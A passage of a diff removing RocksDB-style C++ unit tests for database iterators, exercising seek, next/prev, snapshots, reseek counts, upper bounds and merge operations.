-  iter->Seek(MakeLongKey(50, 1));
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(50, 1) + "->1");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(32, 2) + "->2");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), MakeLongKey(127, 3) + "->3");
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterNextWithNewerSeq) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("d", "e"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Seek(Slice("a"));
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->SeekForPrev(Slice("b"));
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Next();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterPrevWithNewerSeq) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("d", "e"));
-  auto iter = db_->NewIterator(ReadOptions());
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Seek(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "d->e");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  iter->SeekForPrev(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "d->e");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterPrevWithNewerSeq2) {
-  ASSERT_OK(Put("0", "0"));
-  dbfull()->Flush(FlushOptions());
-  ASSERT_OK(Put("a", "b"));
-  ASSERT_OK(Put("c", "d"));
-  ASSERT_OK(Put("e", "f"));
-  auto iter = db_->NewIterator(ReadOptions());
-  auto iter2 = db_->NewIterator(ReadOptions());
-  iter->Seek(Slice("c"));
-  iter2->SeekForPrev(Slice("d"));
-  ASSERT_EQ(IterStatus(iter), "c->d");
-  ASSERT_EQ(IterStatus(iter2), "c->d");
-
-  // Create a key that needs to be skipped for Seq too new
-  for (uint64_t i = 0; i < last_options_.max_sequential_skip_in_iterations + 1;
-       i++) {
-    ASSERT_OK(Put("b", "f"));
-  }
-
-  iter->Prev();
-  ASSERT_EQ(IterStatus(iter), "a->b");
-  iter->Prev();
-  iter2->Prev();
-  ASSERT_EQ(IterStatus(iter2), "a->b");
-  iter2->Prev();
-  delete iter;
-  delete iter2;
-}
-
-TEST_F(DBIteratorTest, IterEmpty) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("foo");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekForPrev("foo");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterSingle) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("b");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("b");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterMulti) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    ASSERT_OK(Put(1, "b", "vb"));
-    ASSERT_OK(Put(1, "c", "vc"));
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->Seek("");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Seek("a");
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Seek("ax");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->SeekForPrev("d");
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->SeekForPrev("c");
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->SeekForPrev("bx");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    iter->Seek("b");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Seek("z");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekForPrev("b");
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->SeekForPrev("");
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    // Switch from reverse to forward
-    iter->SeekToLast();
-    iter->Prev();
-    iter->Prev();
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    // Switch from forward to reverse
-    iter->SeekToFirst();
-    iter->Next();
-    iter->Next();
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-
-    // Make sure iter stays at snapshot
-    ASSERT_OK(Put(1, "a", "va2"));
-    ASSERT_OK(Put(1, "a2", "va3"));
-    ASSERT_OK(Put(1, "b", "vb2"));
-    ASSERT_OK(Put(1, "c", "vc2"));
-    ASSERT_OK(Delete(1, "b"));
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->vb");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-// Check that we can skip over a run of user keys
-// by using reseek rather than sequential scan
-TEST_F(DBIteratorTest, IterReseek) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  Options options = CurrentOptions(options_override);
-  options.max_sequential_skip_in_iterations = 3;
-  options.create_if_missing = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // insert three keys with same userkey and verify that
-  // reseek is not invoked. For each of these test cases,
-  // verify that we can find the next key "b".
-  ASSERT_OK(Put(1, "a", "zero"));
-  ASSERT_OK(Put(1, "a", "one"));
-  ASSERT_OK(Put(1, "a", "two"));
-  ASSERT_OK(Put(1, "b", "bone"));
-  Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "a->two");
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // insert a total of three keys with same userkey and verify
-  // that reseek is still not invoked.
-  ASSERT_OK(Put(1, "a", "three"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(IterStatus(iter), "a->three");
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // insert a total of four keys with same userkey and verify
-  // that reseek is invoked.
-  ASSERT_OK(Put(1, "a", "four"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToFirst();
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 0);
-  iter->Next();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION), 1);
-  ASSERT_EQ(IterStatus(iter), "b->bone");
-  delete iter;
-
-  // Testing reverse iterator
-  // At this point, we have three versions of "a" and one version of "b".
-  // The reseek statistics is already at 1.
-  int num_reseeks = static_cast<int>(
-      TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION));
-
-  // Insert another version of b and assert that reseek is not invoked
-  ASSERT_OK(Put(1, "b", "btwo"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), "b->btwo");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks);
-  iter->Prev();
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 1);
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  delete iter;
-
-  // insert two more versions of b. This makes a total of 4 versions
-  // of b and 4 versions of a.
-  ASSERT_OK(Put(1, "b", "bthree"));
-  ASSERT_OK(Put(1, "b", "bfour"));
-  iter = db_->NewIterator(ReadOptions(), handles_[1]);
-  iter->SeekToLast();
-  ASSERT_EQ(IterStatus(iter), "b->bfour");
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 2);
-  iter->Prev();
-
-  // the previous Prev call should have invoked reseek
-  ASSERT_EQ(TestGetTickerCount(options, NUMBER_OF_RESEEKS_IN_ITERATION),
-            num_reseeks + 3);
-  ASSERT_EQ(IterStatus(iter), "a->four");
-  delete iter;
-}
-
-TEST_F(DBIteratorTest, IterSmallAndLargeMix) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "a", "va"));
-    ASSERT_OK(Put(1, "b", std::string(100000, 'b')));
-    ASSERT_OK(Put(1, "c", "vc"));
-    ASSERT_OK(Put(1, "d", std::string(100000, 'd')));
-    ASSERT_OK(Put(1, "e", std::string(100000, 'e')));
-
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    iter->SeekToFirst();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "b->" + std::string(100000, 'b'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "d->" + std::string(100000, 'd'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "e->" + std::string(100000, 'e'));
-    iter->Next();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    iter->SeekToLast();
-    ASSERT_EQ(IterStatus(iter), "e->" + std::string(100000, 'e'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "d->" + std::string(100000, 'd'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "c->vc");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "b->" + std::string(100000, 'b'));
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "a->va");
-    iter->Prev();
-    ASSERT_EQ(IterStatus(iter), "(invalid)");
-
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, IterMultiWithDelete) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "ka", "va"));
-    ASSERT_OK(Put(1, "kb", "vb"));
-    ASSERT_OK(Put(1, "kc", "vc"));
-    ASSERT_OK(Delete(1, "kb"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "kb"));
-
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-    iter->Seek("kc");
-    ASSERT_EQ(IterStatus(iter), "kc->vc");
-    if (!CurrentOptions().merge_operator) {
-      // TODO: merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ &&
-          kHashSkipList != option_config_) {  // doesn't support SeekToLast
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "ka->va");
-      }
-    }
-    delete iter;
-  } while (ChangeOptions());
-}
-
-TEST_F(DBIteratorTest, IterPrevMaxSkip) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    for (int i = 0; i < 2; i++) {
-      ASSERT_OK(Put(1, "key1", "v1"));
-      ASSERT_OK(Put(1, "key2", "v2"));
-      ASSERT_OK(Put(1, "key3", "v3"));
-      ASSERT_OK(Put(1, "key4", "v4"));
-      ASSERT_OK(Put(1, "key5", "v5"));
-    }
-
-    VerifyIterLast("key5->v5", 1);
-
-    ASSERT_OK(Delete(1, "key5"));
-    VerifyIterLast("key4->v4", 1);
-
-    ASSERT_OK(Delete(1, "key4"));
-    VerifyIterLast("key3->v3", 1);
-
-    ASSERT_OK(Delete(1, "key3"));
-    VerifyIterLast("key2->v2", 1);
-
-    ASSERT_OK(Delete(1, "key2"));
-    VerifyIterLast("key1->v1", 1);
-
-    ASSERT_OK(Delete(1, "key1"));
-    VerifyIterLast("(invalid)", 1);
-  } while (ChangeOptions(kSkipMergePut | kSkipNoSeekToLast));
-}
-
-TEST_F(DBIteratorTest, IterWithSnapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    ASSERT_OK(Put(1, "key1", "val1"));
-    ASSERT_OK(Put(1, "key2", "val2"));
-    ASSERT_OK(Put(1, "key3", "val3"));
-    ASSERT_OK(Put(1, "key4", "val4"));
-    ASSERT_OK(Put(1, "key5", "val5"));
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-    ReadOptions options;
-    options.snapshot = snapshot;
-    Iterator* iter = db_->NewIterator(options, handles_[1]);
-
-    ASSERT_OK(Put(1, "key0", "val0"));
-    // Put more values after the snapshot
-    ASSERT_OK(Put(1, "key100", "val100"));
-    ASSERT_OK(Put(1, "key101", "val101"));
-
-    iter->Seek("key5");
-    ASSERT_EQ(IterStatus(iter), "key5->val5");
-    if (!CurrentOptions().merge_operator) {
-      // TODO: merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ && kHashSkipList != option_config_) {
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key4->val4");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key3->val3");
-
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key4->val4");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key5->val5");
-      }
-      iter->Next();
-      ASSERT_TRUE(!iter->Valid());
-    }
-
-    if (!CurrentOptions().merge_operator) {
-      // TODO(gzh): merge operator does not support backward iteration yet
-      if (kPlainTableAllBytesPrefix != option_config_ &&
-          kBlockBasedTableWithWholeKeyHashIndex != option_config_ &&
-          kHashLinkList != option_config_ && kHashSkipList != option_config_) {
-        iter->SeekForPrev("key1");
-        ASSERT_EQ(IterStatus(iter), "key1->val1");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key2->val2");
-        iter->Next();
-        ASSERT_EQ(IterStatus(iter), "key3->val3");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key2->val2");
-        iter->Prev();
-        ASSERT_EQ(IterStatus(iter), "key1->val1");
-        iter->Prev();
-        ASSERT_TRUE(!iter->Valid());
-      }
-    }
-    db_->ReleaseSnapshot(snapshot);
-    delete iter;
-    // skip as HashCuckooRep does not support snapshot
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-TEST_F(DBIteratorTest, IteratorPinsRef) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    Put(1, "foo", "hello");
-
-    // Get iterator that will yield the current contents of the DB.
-    Iterator* iter = db_->NewIterator(ReadOptions(), handles_[1]);
-
-    // Write to force compactions
-    Put(1, "foo", "newvalue1");
-    for (int i = 0; i < 100; i++) {
-      // 100K values
-      ASSERT_OK(Put(1, Key(i), Key(i) + std::string(100000, 'v')));
-    }
-    Put(1, "foo", "newvalue2");
-
-    iter->SeekToFirst();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo", iter->key().ToString());
-    ASSERT_EQ("hello", iter->value().ToString());
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-    delete iter;
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBIteratorTest, DBIteratorBoundTest) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.create_if_missing = true;
-
-  options.prefix_extractor = nullptr;
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("a", "0"));
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("g1", "0"));
-
-  // testing basic case with no iterate_upper_bound and no prefix_extractor
-  {
-    ReadOptions ro;
-    ro.iterate_upper_bound = nullptr;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("g1")), 0);
-
-    iter->SeekForPrev("g1");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("g1")), 0);
-
-    iter->Prev();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-
-    iter->Prev();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-  }
-
-  // testing iterate_upper_bound and forward iterator
-  // to make sure it stops at bound
-  {
-    ReadOptions ro;
-    // iterate_upper_bound points beyond the last expected entry
-    Slice prefix("foo2");
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("foo")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("foo1")), 0);
-
-    iter->Next();
-    // should stop here...
-    ASSERT_TRUE(!iter->Valid());
-  }
-  // Testing SeekToLast with iterate_upper_bound set
-  {
-    ReadOptions ro;
-
-    Slice prefix("foo");
-    ro.iterate_upper_bound = &prefix;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->SeekToLast();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("a")), 0);
-  }
-
-  // prefix is the first letter of the key
-  options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("a", "0"));
-  ASSERT_OK(Put("foo", "bar"));
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("g1", "0"));
-
-  // testing with iterate_upper_bound and prefix_extractor
-  // Seek target and iterate_upper_bound are not is same prefix
-  // This should be an error
-  {
-    ReadOptions ro;
-    Slice upper_bound("g");
-    ro.iterate_upper_bound = &upper_bound;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("foo");
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo", iter->key().ToString());
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ("foo1", iter->key().ToString());
-
-    iter->Next();
-    ASSERT_TRUE(!iter->Valid());
-  }
-
-  // testing that iterate_upper_bound prevents iterating over deleted items
-  // if the bound has already reached
-  {
-    options.prefix_extractor = nullptr;
-    DestroyAndReopen(options);
-    ASSERT_OK(Put("a", "0"));
-    ASSERT_OK(Put("b", "0"));
-    ASSERT_OK(Put("b1", "0"));
-    ASSERT_OK(Put("c", "0"));
-    ASSERT_OK(Put("d", "0"));
-    ASSERT_OK(Put("e", "0"));
-    ASSERT_OK(Delete("c"));
-    ASSERT_OK(Delete("d"));
-
-    // base case with no bound
-    ReadOptions ro;
-    ro.iterate_upper_bound = nullptr;
-
-    std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-    iter->Seek("b");
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("b")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("b1")), 0);
-
-    get_perf_context()->Reset();
-    iter->Next();
-
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 2);
-
-    // now testing with iterate_bound
-    Slice prefix("c");
-    ro.iterate_upper_bound = &prefix;
-
-    iter.reset(db_->NewIterator(ro));
-
-    get_perf_context()->Reset();
-
-    iter->Seek("b");
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(Slice("b")), 0);
-
-    iter->Next();
-    ASSERT_TRUE(iter->Valid());
-    ASSERT_EQ(iter->key().compare(("b1")), 0);
-
-    iter->Next();
-    // the iteration should stop as soon as the bound key is reached
-    // even though the key is deleted
-    // hence internal_delete_skipped_count should be 0
-    ASSERT_TRUE(!iter->Valid());
-    ASSERT_EQ(static_cast<int>(get_perf_context()->internal_delete_skipped_count), 0);
-  }
-}
-
-TEST_F(DBIteratorTest, DBIteratorBoundOptimizationTest) {
-  int upper_bound_hits = 0;
-  Options options = CurrentOptions();
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound",
-      [&upper_bound_hits](void* arg) {
-        assert(arg != nullptr);
-        upper_bound_hits += (*static_cast<bool*>(arg) ? 1 : 0);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  options.env = env_;
-  options.create_if_missing = true;
-  options.prefix_extractor = nullptr;
-  BlockBasedTableOptions table_options;
-  table_options.flush_block_policy_factory =
-    std::make_shared<FlushBlockEveryKeyPolicyFactory>();
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo1", "bar1"));
-  ASSERT_OK(Put("foo2", "bar2"));
-  ASSERT_OK(Put("foo4", "bar4"));
-  ASSERT_OK(Flush());
-
-  Slice ub("foo3");
-  ReadOptions ro;
-  ro.iterate_upper_bound = &ub;
-
-  std::unique_ptr<Iterator> iter(db_->NewIterator(ro));
-
-  iter->Seek("foo");
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("foo1")), 0);
-  ASSERT_EQ(upper_bound_hits, 0);
-
-  iter->Next();
-  ASSERT_TRUE(iter->Valid());
-  ASSERT_EQ(iter->key().compare(Slice("foo2")), 0);
-  ASSERT_EQ(upper_bound_hits, 0);
-
-  iter->Next();
-  ASSERT_FALSE(iter->Valid());
-  ASSERT_EQ(upper_bound_hits, 1);
-}
-// TODO(3.13): fix the issue of Seek() + Prev() which might not necessary
-//             return the biggest key which is smaller than the seek key.
-TEST_F(DBIteratorTest, PrevAfterAndNextAfterMerge) {
-  Options options;
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreatePutOperator();
-  options.env = env_;
-  DestroyAndReopen(options);
-
-  // write three entries with different keys using Merge()
-  WriteOptions wopts;
-  db_->Merge(wopts, "1", "data1");
-  db_->Merge(wopts, "2", "data2");
-  db_->Merge(wopts, "3", "data3");
-
-  std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-
-  it->Seek("2");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("2", it->key().ToString());
-
-  it->Prev();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("1", it->key().ToString());
-
-  it->SeekForPrev("1");
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("1", it->key().ToString());
-
-  it->Next();
-  ASSERT_TRUE(it->Valid());
-  ASSERT_EQ("2", it->key().ToString());
-}
-
-TEST_F(DBIteratorTest, PinnedDataIteratorRandomized) {
-  enum TestConfig {
-    NORMAL,
-    CLOSE_AND_OPEN,
-    COMPACT_BEFORE_READ,
-    FLUSH_EVERY_1000,
-    MAX
-  };
-
-  // Generate Random data
-  Random rnd(301);
-
-  int puts = 100000;
-  int key_pool = static_cast<int>(puts * 0.7);
-  int key_size = 100;
-  int val_size = 1000;
-  int seeks_percentage = 20;   // 20% of keys will be used to test seek()
-  int delete_percentage = 20;  // 20% of keys will be deleted
-  int merge_percentage = 20;   // 20% of keys will be added using Merge()
-
-  for (int run_config = 0; run_config < TestConfig::MAX; run_config++) {
-    Options options = CurrentOptions();
-    BlockBasedTableOptions table_options;
-    table_options.use_delta_encoding = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    options.merge_operator = MergeOperators::CreatePutOperator();
-    DestroyAndReopen(options);
-
-    std::vector<std::string> generated_keys(key_pool);
-    for (int i = 0; i < key_pool; i++) {
-      generated_keys[i] = RandomString(&rnd, key_size);
-    }
-
-    std::map<std::string, std::string> true_data;
-    std::vector<std::string> random_keys;
-    std::vector<std::string> deleted_keys;
-    for (int i = 0; i < puts; i++) {
-      auto& k = generated_keys[rnd.Next() % key_pool];
-      auto v = RandomString(&rnd, val_size);
-
-      // Insert data to true_data map and to DB
-      true_data[k] = v;
-      if (rnd.OneIn(static_cast<int>(100.0 / merge_percentage))) {
-        ASSERT_OK(db_->Merge(WriteOptions(), k, v));
-      } else {
-        ASSERT_OK(Put(k, v));
-      }
-
-      // Pick random keys to be used to test Seek()
-      if (rnd.OneIn(static_cast<int>(100.0 / seeks_percentage))) {
-        random_keys.push_back(k);
-      }
-
-      // Delete some random keys
-      if (rnd.OneIn(static_cast<int>(100.0 / delete_percentage))) {
-        deleted_keys.push_back(k);
-        true_data.erase(k);
-        ASSERT_OK(Delete(k));
-      }
-
-      if (run_config == TestConfig::FLUSH_EVERY_1000) {
-        if (i && i % 1000 == 0) {
-          Flush();
-        }
-      }
-    }
-
-    if (run_config == TestConfig::CLOSE_AND_OPEN) {
-      Close();
-      Reopen(options);
-    } else if (run_config == TestConfig::COMPACT_BEFORE_READ) {
-      db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    }
-
-    ReadOptions ro;
-    ro.pin_data = true;
